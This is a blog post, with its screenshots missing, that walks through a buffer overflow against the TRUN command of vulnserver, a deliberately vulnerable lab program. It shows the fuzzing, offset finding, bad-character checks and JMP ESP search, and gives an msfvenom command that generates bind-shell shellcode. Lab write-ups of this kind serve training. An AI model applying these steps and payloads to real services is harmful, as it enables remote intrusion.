Vulnserver Buffer Overflow — TRUN

What is vulnserver?

Tools used

  • Immunity debugger
  • Spike
  • nmap
  • Netcat
  • monapy
  • Microsoft Code
Default port used by vulnserver
nc -nv 192.168.173.130 9999
Initial connection
TRUN input
Attack vulnserver to Immunity
s_readline();
s_string("TRUN ");
s_string_variable("COMMAND");The
generic_send_tcp 192.168.173.130 9999 buff.spk 0 0
Fuzzing stops
Exploit 1
Crash replicated
Generate 5000 character string
Exploit 2
EIP replaced to 6F43376F
Metasploit Pattern Offset
Mona Findmsp
Exploit 3
Exploit 3 results
!mona bytearray
Exploit 4
No more bad characters
!mona jmp -r esp -m “essfunc.dll”
jmp esp for essfunc.dll
msfvenom -p windows/shell_bind_tcp EXITFUNC=thread -b "\x00" -f c
  • The JMP ESP from the DLL identified
  • A nopsled before the shellcode (24 NOP instructions)
Shellcode
Exploit 5
Shellz!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Brenton Swanepoel

Brenton Swanepoel

Excited about OSINT, threat hunting and the general breaking of things